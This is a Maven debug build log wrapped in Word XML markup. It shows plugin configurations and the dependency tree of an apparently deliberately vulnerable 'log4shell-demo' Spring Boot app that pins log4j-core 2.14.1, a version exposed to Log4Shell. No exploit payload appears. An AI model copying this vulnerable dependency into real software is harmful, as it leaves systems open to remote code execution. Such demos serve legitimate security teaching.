    <w:p w14:paraId="0EF73B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&lt;generatedTestSourcesDirectory default-value="${project.build.directory}/generated-test-sources/test-annotations"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAB9F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&lt;maxmem&gt;${maven.compiler.maxmem}&lt;/maxmem&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1925A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&lt;meminitial&gt;${maven.compiler.meminitial}&lt;/meminitial&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC683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&lt;mojoExecution default-value="${mojoExecution}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A664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&lt;optimize default-value="false"&gt;${maven.compiler.optimize}&lt;/optimize&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5B0D4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&lt;outputDirectory default-value="${project.build.testOutputDirectory}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2319B3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&lt;parameters default-value="false"&gt;true&lt;/parameters&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C097EF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&lt;project default-value="${project}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035793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&lt;release&gt;${maven.compiler.release}&lt;/release&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CE1EC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&lt;session default-value="${session}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7F83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&lt;showDeprecation default-value="false"&gt;${maven.compiler.showDeprecation}&lt;/showDeprecation&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D42E0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&lt;showWarnings default-value="false"&gt;${maven.compiler.showWarnings}&lt;/showWarnings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F63F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&lt;skip&gt;${maven.test.skip}&lt;/skip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF38D6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&lt;skipMultiThreadWarning default-value="false"&gt;${maven.compiler.skipMultiThreadWarning}&lt;/skipMultiThreadWarning&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76839B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&lt;source default-value="1.6"&gt;${maven.compiler.source}&lt;/source&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E4FE7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&lt;staleMillis default-value="0"&gt;${lastModGranularityMs}&lt;/staleMillis&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3903E6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&lt;target default-value="1.6"&gt;${maven.compiler.target}&lt;/target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659CE5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&lt;testPath default-value="${project.testClasspathElements}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1582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&lt;testRelease&gt;${maven.compiler.testRelease}&lt;/testRelease&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0737A1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&lt;testSource&gt;${maven.compiler.testSource}&lt;/testSource&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2A33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&lt;testTarget&gt;${maven.compiler.testTarget}&lt;/testTarget&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F691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&lt;useIncrementalCompilation default-value="true"&gt;${maven.compiler.useIncrementalCompilation}&lt;/useIncrementalCompilation&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034387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&lt;verbose default-value="false"&gt;${maven.compiler.verbose}&lt;/verbose&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C0EE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14869E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7088B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Goal:          org.apache.maven.plugins:maven-surefire-plugin:2.22.2:test (default-test)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7738803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Style:         Regular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9B5A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Configuration: &lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFB2E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4E2A416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&lt;additionalClasspathElements&gt;${maven.test.additionalClasspath}&lt;/additionalClasspathElements&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461B61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&lt;argLine&gt;${argLine}&lt;/argLine&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237D68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&lt;basedir default-value="${basedir}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D20EE3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&lt;childDelegation default-value="false"&gt;${childDelegation}&lt;/childDelegation&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135FC3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&lt;classesDirectory default-value="${project.build.outputDirectory}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEEC5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&lt;classpathDependencyExcludes&gt;${maven.test.dependency.excludes}&lt;/classpathDependencyExcludes&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7219FF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&lt;debugForkedProcess&gt;${maven.surefire.debug}&lt;/debugForkedProcess&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7393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&lt;dependenciesToScan&gt;${dependenciesToScan}&lt;/dependenciesToScan&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE6D50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&lt;disableXmlReport default-value="false"&gt;${disableXmlReport}&lt;/disableXmlReport&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28864D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&lt;enableAssertions default-value="true"&gt;${enableAssertions}&lt;/enableAssertions&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435D9B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&lt;encoding default-value="${project.reporting.outputEncoding}"&gt;${surefire.encoding}&lt;/encoding&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79220C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&lt;excludedGroups&gt;${excludedGroups}&lt;/excludedGroups&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A58D0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&lt;excludesFile&gt;${surefire.excludesFile}&lt;/excludesFile&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C42A3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&lt;failIfNoSpecifiedTests&gt;${surefire.failIfNoSpecifiedTests}&lt;/failIfNoSpecifiedTests&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13807A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&lt;failIfNoTests&gt;${failIfNoTests}&lt;/failIfNoTests&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DBCD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&lt;forkCount default-value="1"&gt;${forkCount}&lt;/forkCount&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056FB6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&lt;forkMode default-value="once"&gt;${forkMode}&lt;/forkMode&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AFAE1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&lt;forkedProcessExitTimeoutInSeconds default-value="30"&gt;${surefire.exitTimeout}&lt;/forkedProcessExitTimeoutInSeconds&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B741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&lt;forkedProcessTimeoutInSeconds&gt;${surefire.timeout}&lt;/forkedProcessTimeoutInSeconds&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38581F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&lt;groups&gt;${groups}&lt;/groups&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C3B2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&lt;includesFile&gt;${surefire.includesFile}&lt;/includesFile&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B6AC3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&lt;junitArtifactName default-value="junit:junit"&gt;${junitArtifactName}&lt;/junitArtifactName&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFA849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&lt;junitPlatformArtifactName default-value="org.junit.platform:junit-platform-engine"&gt;${junitPlatformArtifactName}&lt;/junitPlatformArtifactName&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BC717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&lt;jvm&gt;${jvm}&lt;/jvm&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1058A9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&lt;localRepository default-value="${localRepository}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3469CA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&lt;objectFactory&gt;${objectFactory}&lt;/objectFactory&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597E87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&lt;parallel&gt;${parallel}&lt;/parallel&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6629C0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&lt;parallelMavenExecution default-value="${session.parallel}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD6C8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&lt;parallelOptimized default-value="true"&gt;${parallelOptimized}&lt;/parallelOptimized&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC46D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&lt;parallelTestsTimeoutForcedInSeconds&gt;${surefire.parallel.forcedTimeout}&lt;/parallelTestsTimeoutForcedInSeconds&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AC0F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&lt;parallelTestsTimeoutInSeconds&gt;${surefire.parallel.timeout}&lt;/parallelTestsTimeoutInSeconds&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EE659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&lt;perCoreThreadCount default-value="true"&gt;${perCoreThreadCount}&lt;/perCoreThreadCount&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BBC4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&lt;pluginArtifactMap&gt;${plugin.artifactMap}&lt;/pluginArtifactMap&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B71CF4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&lt;pluginDescriptor default-value="${plugin}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182A1C1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&lt;printSummary default-value="true"&gt;${surefire.printSummary}&lt;/printSummary&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22840F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&lt;projectArtifactMap&gt;${project.artifactMap}&lt;/projectArtifactMap&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F42FD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&lt;projectBuildDirectory default-value="${project.build.directory}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FB81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&lt;redirectTestOutputToFile default-value="false"&gt;${maven.test.redirectTestOutputToFile}&lt;/redirectTestOutputToFile&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A518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&lt;remoteRepositories default-value="${project.pluginArtifactRepositories}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169A3A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&lt;reportFormat default-value="brief"&gt;${surefire.reportFormat}&lt;/reportFormat&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CF45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&lt;reportNameSuffix default-value=""&gt;${surefire.reportNameSuffix}&lt;/reportNameSuffix&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAC4C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&lt;reportsDirectory default-value="${project.build.directory}/surefire-reports"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFCC46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&lt;rerunFailingTestsCount default-value="0"&gt;${surefire.rerunFailingTestsCount}&lt;/rerunFailingTestsCount&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0725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&lt;reuseForks default-value="true"&gt;${reuseForks}&lt;/reuseForks&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C39F5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&lt;runOrder default-value="filesystem"&gt;${surefire.runOrder}&lt;/runOrder&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769DAB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&lt;shutdown default-value="testset"&gt;${surefire.shutdown}&lt;/shutdown&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CDB0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 default-value="false"&gt;${maven.test.skip}&lt;/skip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FED2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&lt;skipAfterFailureCount default-value="0"&gt;${surefire.skipAfterFailureCount}&lt;/skipAfterFailureCount&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CB5A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&lt;skipExec&gt;${maven.test.skip.exec}&lt;/skipExec&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085482C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&lt;skipTests default-value="false"&gt;${skipTests}&lt;/skipTests&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2939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&lt;suiteXmlFiles&gt;${surefire.suiteXmlFiles}&lt;/suiteXmlFiles&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2183C6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&lt;tempDir default-value="surefire"&gt;${tempDir}&lt;/tempDir&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5763DE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&lt;test&gt;${test}&lt;/test&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D63083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&lt;testClassesDirectory default-value="${project.build.testOutputDirectory}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3FE12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&lt;testFailureIgnore default-value="false"&gt;${maven.test.failure.ignore}&lt;/testFailureIgnore&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAC88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&lt;testNGArtifactName default-value="org.testng:testng"&gt;${testNGArtifactName}&lt;/testNGArtifactName&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31ED3F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&lt;testSourceDirectory default-value="${project.build.testSourceDirectory}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BC5C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&lt;threadCount&gt;${threadCount}&lt;/threadCount&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563265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&lt;threadCountClasses default-value="0"&gt;${threadCountClasses}&lt;/threadCountClasses&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6674E6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&lt;threadCountMethods default-value="0"&gt;${threadCountMethods}&lt;/threadCountMethods&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB173F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&lt;threadCountSuites default-value="0"&gt;${threadCountSuites}&lt;/threadCountSuites&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB9F7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&lt;trimStackTrace default-value="true"&gt;${trimStackTrace}&lt;/trimStackTrace&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784CB1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&lt;useFile default-value="true"&gt;${surefire.useFile}&lt;/useFile&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315466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&lt;useManifestOnlyJar default-value="true"&gt;${surefire.useManifestOnlyJar}&lt;/useManifestOnlyJar&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DED8D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&lt;useSystemClassLoader default-value="true"&gt;${surefire.useSystemClassLoader}&lt;/useSystemClassLoader&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D538B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&lt;useUnlimitedThreads default-value="false"&gt;${useUnlimitedThreads}&lt;/useUnlimitedThreads&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392B2C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&lt;workingDirectory&gt;${basedir}&lt;/workingDirectory&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485925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&lt;project default-value="${project}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFB62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&lt;session default-value="${session}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D00F8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19582C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A55C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Goal:          org.apache.maven.plugins:maven-jar-plugin:3.2.0:jar (default-jar)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E5F2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Style:         Regular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A808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Configuration: &lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0951D4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234944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&lt;archive&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD27F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&lt;manifest&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4265FE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&lt;mainClass&gt;${start-class}&lt;/mainClass&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDD5E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&lt;addDefaultImplementationEntries&gt;true&lt;/addDefaultImplementationEntries&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106FFD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&lt;/manifest&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335C69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&lt;/archive&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4512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&lt;classesDirectory default-value="${project.build.outputDirectory}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F1EF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&lt;finalName default-value="${project.build.finalName}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137E9A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&lt;forceCreation default-value="false"&gt;${maven.jar.forceCreation}&lt;/forceCreation&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFC20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&lt;outputDirectory default-value="${project.build.directory}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356D98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&lt;outputTimestamp default-value="${project.build.outputTimestamp}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487301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&lt;project default-value="${project}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1A374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&lt;session default-value="${session}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC74B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&lt;skipIfEmpty default-value="false"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AEFE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&lt;useDefaultManifestFile default-value="false"&gt;${jar.useDefaultManifestFile}&lt;/useDefaultManifestFile&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5A8F8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404196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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4A83C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Goal:          org.springframework.boot:spring-boot-maven-plugin:2.5.5:repackage (repackage)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ADA2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Style:         Regular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183F56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Configuration: &lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DE86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03ED68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&lt;attach default-value="true"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D014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&lt;excludeDevtools default-value="true"&gt;${spring-boot.repackage.excludeDevtools}&lt;/excludeDevtools&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA8BC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&lt;excludeGroupIds default-value=""&gt;${spring-boot.excludeGroupIds}&lt;/excludeGroupIds&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1643EB6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&lt;excludes&gt;${spring-boot.excludes}&lt;/excludes&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AAF21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&lt;executable default-value="false"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27151E4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&lt;finalName default-value="${project.build.finalName}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7036D0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&lt;includeSystemScope default-value="false"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FCAC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&lt;includes&gt;${spring-boot.includes}&lt;/includes&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5576E51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&lt;layout&gt;${spring-boot.repackage.layout}&lt;/layout&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4080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&lt;mainClass&gt;com.example.log4shell.Log4ShellDemoApplication&lt;/mainClass&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9AEF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&lt;outputDirectory default-value="${project.build.directory}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EB7A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&lt;outputTimestamp default-value="${project.build.outputTimestamp}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCA48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&lt;project default-value="${project}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574FDE5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&lt;session default-value="${session}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E11716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&lt;skip default-value="false"&gt;${spring-boot.repackage.skip}&lt;/skip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E37F59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&lt;/configuration&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D5DA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2B69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[DEBUG] Dependency collection stats {ConflictMarker.analyzeTime=9842985, ConflictMarker.markTime=242140, ConflictMarker.nodeCount=71, ConflictIdSorter.graphTime=2879896, ConflictIdSorter.topsortTime=259001, </w:t>
      </w:r>
      <w:r w:rsidRPr="009B72F7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ConflictIdSorter.conflictIdCount=36, ConflictIdSorter.conflictIdCycleCount=0, ConflictResolver.totalTime=5866825, ConflictResolver.conflictItemCount=70, DefaultDependencyCollector.collectTime=200385593, DefaultDependencyCollector.transformTime=20180407}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128455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com.example:log4shell-demo:jar:0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CCE68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org.springframework.boot:spring-boot-starter-web:jar:2.5.5:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B46C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org.springframework.boot:spring-boot-starter:jar:2.5.5:compile (version managed from 2.5.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B587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org.springframework.boot:spring-boot:jar:2.5.5:compile (version managed from 2.5.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472327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org.springframework.boot:spring-boot-autoconfigure:jar:2.5.5:compile (version managed from 2.5.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA8AA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org.springframework.boot:spring-boot-starter-logging:jar:2.5.5:compile (version managed from 2.5.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ACE9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ch.qos.logback:logback-classic:jar:1.2.6:compile (version managed from 1.2.6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B76EB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ch.qos.logback:logback-core:jar:1.2.6:compile (version managed from 1.2.6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C40E62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org.apache.logging.log4j:log4j-to-slf4j:jar:2.14.1:compile (version managed from 2.14.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CA0F0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jakarta.annotation:jakarta.annotation-api:jar:1.3.5:compile (version managed from 1.3.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AE72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org.springframework:spring-core:jar:5.3.10:compile (version managed from 5.3.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197DC3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org.springframework:spring-jcl:jar:5.3.10:compile (version managed from 5.3.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D327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org.yaml:snakeyaml:jar:1.28:compile (version managed from 1.28)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278D2B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org.springframework.boot:spring-boot-starter-json:jar:2.5.5:compile (version managed from 2.5.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB7C20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com.fasterxml.jackson.core:jackson-databind:jar:2.12.5:compile (version managed from 2.12.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9C03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com.fasterxml.jackson.core:jackson-annotations:jar:2.12.5:compile (version managed from 2.12.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253C47F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com.fasterxml.jackson.core:jackson-core:jar:2.12.5:compile (version managed from 2.12.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A085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com.fasterxml.jackson.datatype:jackson-datatype-jdk8:jar:2.12.5:compile (version managed from 2.12.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D38D09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com.fasterxml.jackson.datatype:jackson-datatype-jsr310:jar:2.12.5:compile (version managed from 2.12.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A85FD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com.fasterxml.jackson.module:jackson-module-parameter-names:jar:2.12.5:compile (version managed from 2.12.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5171B38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org.springframework.boot:spring-boot-starter-tomcat:jar:2.5.5:compile (version managed from 2.5.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1200A4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org.apache.tomcat.embed:tomcat-embed-core:jar:9.0.53:compile (version managed from 9.0.53)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBFEC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org.apache.tomcat.embed:tomcat-embed-el:jar:9.0.53:compile (version managed from 9.0.53)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D807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org.apache.tomcat.embed:tomcat-embed-websocket:jar:9.0.53:compile (version managed from 9.0.53)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289384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org.springframework:spring-web:jar:5.3.10:compile (version managed from 5.3.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5B32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org.springframework:spring-beans:jar:5.3.10:compile (version managed from 5.3.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBB72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org.springframework:spring-webmvc:jar:5.3.10:compile (version managed from 5.3.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7133ABE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org.springframework:spring-aop:jar:5.3.10:compile (version managed from 5.3.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6655DE2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org.springframework:spring-context:jar:5.3.10:compile (version managed from 5.3.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0737A0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org.springframework:spring-expression:jar:5.3.10:compile (version managed from 5.3.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C23D2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org.springframework.boot:spring-boot-starter-log4j2:jar:2.5.5:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054E33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org.apache.logging.log4j:log4j-slf4j-impl:jar:2.14.1:compile (version managed from 2.14.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2420D4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org.slf4j:slf4j-api:jar:1.7.32:compile (version managed from 1.7.25)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A77BC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org.apache.logging.log4j:log4j-api:jar:2.14.1:compile (version managed from 2.14.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E82916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org.apache.logging.log4j:log4j-core:jar:2.14.1:compile (version managed from 2.14.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721117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org.apache.logging.log4j:log4j-jul:jar:2.14.1:compile (version managed from 2.14.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B1FB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org.slf4j:jul-to-slf4j:jar:1.7.32:compile (version managed from 1.7.32)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF7F68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65B8D7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maven-clean-plugin:3.1.0:clean (default-clean) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3245D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mirror maven-default-http-blocker (http://0.0.0.0/) for apache.snapshots (http://repository.apache.org/snapshots).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AF22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Dependency collection stats {ConflictMarker.analyzeTime=39758, ConflictMarker.markTime=47654, ConflictMarker.nodeCount=14, ConflictIdSorter.graphTime=14123, ConflictIdSorter.topsortTime=14420, ConflictIdSorter.conflictIdCount=12, ConflictIdSorter.conflictIdCycleCount=0, ConflictResolver.totalTime=314923, ConflictResolver.conflictItemCount=14, DefaultDependencyCollector.collectTime=145040890, DefaultDependencyCollector.transformTime=505538}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DD95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org.apache.maven.plugins:maven-clean-plugin:jar:3.1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC40B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org.apache.maven:maven-plugin-api:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF17F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org.apache.maven:maven-model:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A8E02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org.codehaus.plexus:plexus-utils:jar:2.0.4:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAB125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org.apache.maven:maven-artifact:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EBE1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org.sonatype.sisu:sisu-inject-plexus:jar:1.4.2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023CD78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org.codehaus.plexus:plexus-component-annotations:jar:1.7.1:compile (version managed from default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732431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org.codehaus.plexus:plexus-classworlds:jar:2.2.3:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E97595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org.sonatype.sisu:sisu-inject-bean:jar:1.4.2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4A731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org.sonatype.sisu:sisu-guice:jar:noaop:2.1.7:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062DD3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org.apache.maven.shared:maven-shared-utils:jar:3.2.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2720846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commons-io:commons-io:jar:2.5:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25832F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Created new class realm plugin&gt;org.apache.maven.plugins:maven-clean-plugin:3.1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CB4F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Importing foreign packages into class realm plugin&gt;org.apache.maven.plugins:maven-clean-plugin:3.1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C286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&lt; maven.api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC114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Populating class realm plugin&gt;org.apache.maven.plugins:maven-clean-plugin:3.1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3DC5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org.apache.maven.plugins:maven-clean-plugin:jar:3.1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C9EC8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org.codehaus.plexus:plexus-utils:jar:2.0.4</w:t>
      </w:r>
    </w:p>
